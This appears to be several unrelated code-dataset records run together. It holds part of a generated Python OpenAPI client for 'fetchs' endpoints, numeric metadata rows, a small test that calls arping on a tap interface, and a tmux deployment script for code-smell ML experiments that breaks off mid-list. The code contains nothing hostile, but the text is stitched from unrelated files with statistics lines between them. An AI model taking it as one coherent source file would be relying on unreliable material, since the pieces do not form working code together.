"REJ_ERROR": "rej_error",
"REJ_FETCH": "rej_fetch"
},
},
'openapi_types': {
'limit':
(int,),
'offset':
(int,),
'ordering':
(str,),
'status':
(str,),
},
'attribute_map': {
'limit': 'limit',
'offset': 'offset',
'ordering': 'ordering',
'status': 'status',
},
'location_map': {
'limit': 'query',
'offset': 'query',
'ordering': 'query',
'status': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_list
)
def __fetchs_partial_update(
self,
submission,
**kwargs
):
"""fetchs_partial_update # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_partial_update(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
patched_fetch (PatchedFetch): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_partial_update = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_partial_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'submission',
'patched_fetch',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
'patched_fetch':
(PatchedFetch,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
'patched_fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_partial_update
)
def __fetchs_retrieve(
self,
submission,
**kwargs
):
"""fetchs_retrieve # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_retrieve(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_retrieve = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_retrieve',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'submission',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_retrieve
)
def __fetchs_update(
self,
submission,
**kwargs
):
"""fetchs_update # noqa: E501
SFetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_updated/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_update(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
fetch (Fetch): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_update = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'submission',
'fetch',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
'fetch':
(Fetch,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
'fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_update
)
| 41.278261 | 812 | 0.489151 | 2,943 | 33,229 | 5.337411 | 0.085287 | 0.024064 | 0.019862 | 0.020626 | 0.887255 | 0.881716 | 0.874905 | 0.874905 | 0.857652 | 0.857652 | 0 | 0.003002 | 0.428511 | 33,229 | 804 | 813 | 41.329602 | 0.824171 | 0.414939 | 0 | 0.654344 | 1 | 0 | 0.221785 | 0.029963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012939 | false | 0 | 0.012939 | 0 | 0.038817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71291f0c11afa69185950a4a6716f0449bc0a30a | 156 | py | Python | tcpy/tests/arp_test.py | sfluor/tcpy | 42f61dfccbb9b230884a8b1b64bc7434dea4b464 | [
"MIT"
] | null | null | null | tcpy/tests/arp_test.py | sfluor/tcpy | 42f61dfccbb9b230884a8b1b64bc7434dea4b464 | [
"MIT"
] | null | null | null | tcpy/tests/arp_test.py | sfluor/tcpy | 42f61dfccbb9b230884a8b1b64bc7434dea4b464 | [
"MIT"
] | 1 | 2021-09-27T07:24:55.000Z | 2021-09-27T07:24:55.000Z | from .utils import run_cmd_with_stack
def test_arping() -> None:
# Calling arping
run_cmd_with_stack(["arping", "-c3", "-I", "tap0", "10.0.0.4"])
| 22.285714 | 67 | 0.641026 | 25 | 156 | 3.72 | 0.72 | 0.129032 | 0.215054 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053846 | 0.166667 | 156 | 6 | 68 | 26 | 0.661538 | 0.089744 | 0 | 0 | 0 | 0 | 0.164286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8567edddad324dc5d421c5e558c9b4377cfc20be | 25,301 | py | Python | deployment.py | Bruno81930/smells | bf45687e942b780a11f75815fb14bc1dbbfd6e1e | [
"MIT"
] | 1 | 2021-11-25T13:40:06.000Z | 2021-11-25T13:40:06.000Z | deployment.py | Bruno81930/smells | bf45687e942b780a11f75815fb14bc1dbbfd6e1e | [
"MIT"
] | null | null | null | deployment.py | Bruno81930/smells | bf45687e942b780a11f75815fb14bc1dbbfd6e1e | [
"MIT"
] | null | null | null | from time import sleep
import libtmux as libtmux
from alive_progress import alive_bar
from libtmux import Session
import numpy as np
class BaseApproach:
def __init__(self):
self.projects = ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph',
'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena',
'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix',
'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
'xmlgraphics-fop', 'zeppelin']
self.classifiers = ["rf", "svc", "mp", "dt", "nb"]
self.approaches = {"std": False, "train": False, "test": False, "knn": True, "best": False, "elm": False}
self.base_dir = "/home/machadob/PycharmProjects/smells"
self.base_cmds = [
"conda activate smells",
"source env/bin/activate"
]
@staticmethod
def cmd(dataset, classifier, approach, project, nocache):
project_cmd = ' '.join([f"-p {p}" for p in project])
classifier_cmd = ' '.join([f"-c {c}" for c in classifier])
nocache_cmd = '--nocache' if nocache else ''
cmd = f"python crossproject.py -d {dataset} {classifier_cmd} -a {approach} {project_cmd} {nocache_cmd}"
print(cmd)
return cmd
class Approach(BaseApproach):
def __init__(self, dataset, approach, ignore=None, ignore_clfs=None, enabled=True):
super().__init__()
self.dataset = dataset
assert approach in list(self.approaches.keys()), "Wrong approach."
self.approach = approach
self.session_name = f"{dataset}_{approach}"
self.nocache = self.approaches[approach]
if ignore is not None:
assert all(project in self.projects for project in ignore)
self.projects = list(filter(lambda project: project not in ignore, self.projects))
if ignore_clfs is not None:
assert all(ignore_clf in self.classifiers for ignore_clf in ignore_clfs)
self.classifiers = list(filter(lambda clf: clf not in ignore_clfs, self.classifiers))
self.enabled = enabled
def __call__(self, server):
self.server = server
session_name = f"{self.session_name}"
print(session_name)
if not self.server.has_session(session_name):
self.session: Session = self.server.new_session(session_name)
else:
self.session = self.server.find_where({"session_name": session_name})
self.window = self.session.select_window(0)
if self.approach == "knn" or self.approach == "best":
self.run(0, self.classifiers)
else:
[self.run(num, [classifier]) for num, classifier in enumerate(self.classifiers)]
self.window.select_layout("tiled")
def run(self, num, classifiers):
vertical = num % 2 == 0
pane = self.window.split_window(start_directory=self.base_dir, vertical=vertical)
for cmd in self.base_cmds:
pane.send_keys(cmd)
cmd_args = {"dataset": self.dataset, "classifier": classifiers, "approach": self.approach,
"project": self.projects,
"nocache": self.nocache}
keys = self.cmd(**cmd_args)
if self.enabled:
pane.send_keys(keys)
class KNN(Approach):
def __init__(self, dataset, n_processes=10, ignore=None, enabled=True):
super().__init__(dataset, "knn", ignore=ignore, enabled=enabled)
self.dataset = dataset
self.subprojects = np.array_split(self.projects, n_processes)
self.session_names = [f"{dataset}_knn_{process}" for process in range(n_processes)]
def __call__(self, server):
self.server = server
for name, projects in zip(self.session_names, self.subprojects):
self.session_name = f"tmp_{name}"
self.projects = projects
super().__call__(server)
class BestOfBreed(Approach):
def __init__(self, dataset, n_processes=20, ignore=None, enabled=True):
super().__init__(dataset, "best", ignore=ignore, enabled=enabled)
self.dataset = dataset
self.subprojects = np.array_split(self.projects, n_processes)
self.session_names = [f"{dataset}_best_breed_{process}" for process in range(n_processes)]
def __call__(self, server):
self.server = server
for name, projects in zip(self.session_names, self.subprojects):
self.session_name = f"tmp_{name}"
self.projects = projects
super().__call__(server)
metrics_smells = BestOfBreed("smells_metrics", n_processes=10,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli',
'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv',
'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang',
'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum',
'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server',
'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'jclouds',
'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr',
'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago',
'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x',
'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml',
'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta',
'wicket', 'xmlgraphics-fop', 'zeppelin'])
metrics_1 = BestOfBreed("metrics", n_processes=15,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'calcite', 'camel',
'carbondata', 'cassandra', 'cayenne', 'commons-collections', 'commons-compress',
'commons-csv', 'commons-dbcp', 'commons-email', 'commons-validator', 'commons-vfs',
'continuum', 'crunch', 'curator', 'drill', 'flink', 'giraph', 'hadoop', 'hbase',
'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'maven', 'maven-surefire', 'metron',
'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa',
'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar',
'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
'xmlgraphics-fop', 'zeppelin']
)
metrics_2 = BestOfBreed("metrics", n_processes=2,
ignore=['uima-ruta', 'xmlgraphics-fop', 'accumulo', 'activemq', 'activemq-artemis', 'airavata',
'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel',
'carbondata', 'cassandra', 'cayenne', 'clerezza', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp',
'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf',
'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill',
'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit',
'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox',
'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces',
'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings',
'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms',
'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis',
'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika',
'tinkerpop', 'tomcat', 'tomee', 'wicket', 'zeppelin'])
smells = BestOfBreed("smells", n_processes=15,
ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
'directory-kerby', 'directory-server', 'directory-studio', 'helix', 'hive', 'isis',
'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf',
'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron',
'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'plc4x',
'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
'tomee', 'uima-ruta', 'wicket', 'xmlgraphics-fop', 'zeppelin'])
# metrics_knn = KNN("metrics", ignore=['commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-net', 'crunch', 'myfaces', 'myfaces-tobago', 'parquet-mr', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro'])
# smells_knn = KNN("smells", n_processes=4, ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'zeppelin'])
# metrics_train = Approach("metrics",
# "train",
# ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
# 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
# 'clerezza',
# 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections',
# 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io',
# 'commons-jexl', 'commons-lang', 'commons-math', 'commons-validator',
# 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby',
# 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase',
# 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon',
# 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza',
# 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope',
# 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta',
# 'wicket', 'xmlgraphics-fop', 'zeppelin'],
# ["rf", "svc", "dt", "nb"]
# )
# smells_metrics_std = Approach("smells_metrics", "std")
# smells_metrics_train = Approach("smells_metrics", "train")
# smells_metrics_test = Approach("smells_metrics", "test")
# smells_metrics_knn = KNN("smells_metrics", ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'johnzon', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'olingo-odata4', 'shiro', 'storm', 'struts', 'syncope', 'tika'])
# smells_metrics_best = Approach("smells_metrics", "best")
# smells_elm = Approach("smells", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
# metrics_elm = Approach("metrics", "elm", ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'storm', 'struts', 'syncope', 'systemml', 'tajo', 'tapestry-5', 'tez', 'tika', 'tomcat', 'tomee', 'uima-ruta', 'wicket', 'xmlgraphics-fop', 'zeppelin'], ignore_clfs=["svc", "mp", "dt", "nb"], enabled=True)
# smells_metrics_elm = Approach("smells_metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
# special_knn = KNN("metrics", n_processes=20, ignore=['accumulo', 'bookkeeper', 'commons-beanutils', 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'directory-kerby', 'directory-server', 'helix', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'opennlp', 'openwebbeans', 'parquet-mr', 'phoenix', 'plc4x', 'roller', 'samza', 'santuario-java', 'servicecomb-java-chassis', 'shiro', 'storm', 'tika', 'tinkerpop', 'activemq', 'calcite', 'directory-studio', 'hive', 'kafka', 'nifi', 'pulsar', 'struts', 'tomcat'])
# smells_std = Approach("smells", "std")
# smells_train = Approach("smells", "train")
# smells_test = Approach("smells", "test")
# smells_best = Approach("smells", "best")
# smells_knn = KNN("smells", n_processes=20)
# smells_elm = Approach("smells", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# metrics_std = Approach("metrics", "std")
# metrics_train = Approach("metrics", "train")
# metrics_test = Approach("metrics", "test")
# metrics_best = Approach("metrics", "best")
# # metrics_knn = KNN("metrics")
# metrics_elm = Approach("metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# smells_metrics_std = Approach("smells_metrics", "std")
# smells_metrics_train = Approach("smells_metrics", "train")
# smells_metrics_test = Approach("smells_metrics", "test")
# smells_metrics_knn = KNN("smells_metrics", n_processes=20)
# smells_metrics_best = Approach("smells_metrics", "best")
# smells_metrics_elm = Approach("smells_metrics", "elm", ignore_clfs=["svc", "mp", "dt", "nb"])
#
# broke_knn = KNN("metrics", n_processes=3,
# ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb', 'atlas',
# 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata', 'cassandra', 'cayenne',
# 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli', 'commons-codec',
# 'commons-collections', 'commons-compress', 'commons-csv', 'commons-dbcp', 'commons-email',
# 'commons-io', 'commons-jexl', 'commons-lang', 'commons-math', 'commons-net',
# 'commons-validator', 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
# 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink', 'giraph',
# 'helix', 'hive', 'jackrabbit', 'jackrabbit-oak', 'jclouds',
# 'jena',
# 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf',
# 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
